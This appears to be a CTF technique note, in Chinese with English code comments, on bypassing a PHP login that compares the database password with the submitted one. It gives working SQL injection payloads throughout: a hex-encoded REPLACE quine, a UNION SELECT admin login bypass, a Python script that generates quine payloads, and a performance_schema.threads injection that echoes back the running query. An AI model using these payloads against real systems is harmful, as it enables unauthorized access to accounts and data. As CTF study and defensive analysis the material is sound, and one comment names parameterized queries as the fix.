二次校验


二次校验,又或者是有关quine的东西

二次校验

其实就是quine

前端登录的时候:

后端用 POST 的 password 拼 SQL 去查库,把查出来的 password 字段(即经过 SQL 处理后的结果)和登录前 POST 的原始 password 做比较,相等就视为登录成功(注入点在查询里,比较本身并不需要绕):

// Challenge check, quoted as-is. $row is presumably the row fetched by the
// injected query; $_POST['password'] is the raw submitted value.
// The comparison is loose (==), but the quine bypass below does not depend on
// type juggling: it makes the query return the submitted string byte-for-byte,
// so a strict === would be satisfied just the same. The fix is a parameterized
// query, not a different comparison operator.
if($row['password']==$_POST['password']){
echo $flag;
}

利用replace:

-- Self-reproducing SELECT (a SQL quine). The hex literal decodes to
--   SELECT REPLACE(~,0x7e,concat(0x3078,hex(~)))
-- REPLACE swaps every '~' (0x7e) for the text "0x" (0x3078) followed by the
-- hex of the literal itself, so the result string is exactly this statement.
-- Caveat: HEX() returns uppercase digits, so the literal must be written in
-- uppercase hex or the output differs from the input by letter case and the
-- equality check fails.
SELECT REPLACE(0x53454C454354205245504C414345287E2C307837652C636F6E636174283078333037382C686578287E292929,0x7e,concat(0x3078,hex(0x53454C454354205245504C414345287E2C307837652C636F6E636174283078333037382C686578287E292929)))
-- Same trick as a login payload. The hex literal decodes to
--   UNION SELECT 1,0x61646d696e,REPLACE(~,0x7e,concat(0x3078,hex(~)))#
-- Column 2 (0x61646d696e = 'admin') is the username; column 3 evaluates to
-- this whole payload, which is what the PHP check compares against the
-- POSTed value. The trailing '#' comments out the rest of the original query.
-- NOTE(review): the payload opens with UNION and no closing quote, so it only
-- works where the injection point is unquoted (or quotes are stripped) -- not
-- shown here. As above, the hex must stay uppercase to match HEX() output.
UNION SELECT 1,0x61646d696e,REPLACE(0x554E494F4E2053454C45435420312C3078363136343664363936652C5245504C414345287E2C307837652C636F6E636174283078333037382C686578287E29292923,0x7e,concat(0x3078,hex(0x554E494F4E2053454C45435420312C3078363136343664363936652C5245504C414345287E2C307837652C636F6E636174283078333037382C686578287E29292923)))#

脚本:

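def quine(data, debug=True):
    """Expand a SQL template into a single-quoted quine.

    Every ``$$`` in ``data`` is replaced by a
    ``REPLACE(REPLACE('<blob>',CHAR(34),CHAR(39)),CHAR(36),'<blob>')``
    expression, where ``blob`` is the template with the placeholder spelled
    ``"$"`` and every single quote turned into a double quote so it fits
    inside a ``'...'`` literal without escaping.  When MySQL evaluates the
    expression, the inner REPLACE turns ``"`` back into ``'`` and the outer
    REPLACE expands ``$`` into the blob, so the result is the returned string
    itself -- which is what a "query result == submitted value" check needs.

    Args:
        data: SQL template containing the ``$$`` placeholder.  It must not
            contain a double quote or a lone ``$``: those are exactly the
            characters the generated REPLACE chain rewrites, so they would
            break the self-reproduction silently.
        debug: when true, print the template and the result to stdout.

    Returns:
        The expanded SQL string.

    Raises:
        ValueError: if the template contains ``"`` or a ``$`` that is not part
            of a ``$$`` placeholder.
    """
    if debug:
        print(data)
    # Anything the server-side chain would rewrite must not appear in the
    # template itself, otherwise the output no longer reproduces the input.
    leftover = data.replace("$$", "")
    if '"' in leftover or "$" in leftover:
        raise ValueError("template must not contain '\"' or a bare '$' outside $$")
    expanded = data.replace("$$", "REPLACE(REPLACE($$,CHAR(34),CHAR(39)),CHAR(36),$$)")
    # Quote-free image of the template: "$" marks where the blob re-inserts
    # itself, and ' -> " keeps the blob embeddable in a single-quoted literal.
    blob = expanded.replace("$$", '"$"').replace("'", '"')
    result = expanded.replace("$$", "'" + blob + "'")
    if debug:
        print(result)
    return result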
# Build the payload quietly and print only the finished SQL.
data = quine("' UNION SELECT $$ AS a-- ", debug=False)
print(data)

processlist:

查询当前执行sql语句:

-- Statement text of the sessions visible to the current account; the query
-- itself appears as one of the rows. (Seeing other users' sessions needs the
-- PROCESS privilege -- NOTE(review): confirm what the challenge account has.)
SELECT info
FROM information_schema.processlist;

+-------------------------------------------------+
| info |
+-------------------------------------------------+
| NULL |
| select info from information_schema.processlist |
+-------------------------------------------------+

利用:

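-- Reads the running statement back out of performance_schema.threads so the
-- submitted string re-appears in the result. The 17-constant SELECT gives the
-- derived table columns named `1`..`17`; `11` is meant to line up with
-- PROCESSLIST_INFO, which holds only if the target's threads table has exactly
-- 17 columns in that order (MySQL 5.7 layout -- NOTE(review): 8.0 adds columns,
-- confirm against the target). LIMIT 1,1 skips the constant row; the
-- LIKE '%connection%' filter presumably keeps client-connection threads only.
-- MID() offsets 65/217 are tuned to the challenge's query template and have to
-- be re-derived for any other wrapper. /**/ replaces spaces and '#' drops the
-- rest of the original query.
-- (The listing was previously wrapped mid-token; this is the single-line form.)
1'union/**/select/**/mid(`11`,65,217)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/name/**/like'%connection%'/**/limit/**/1,1)t#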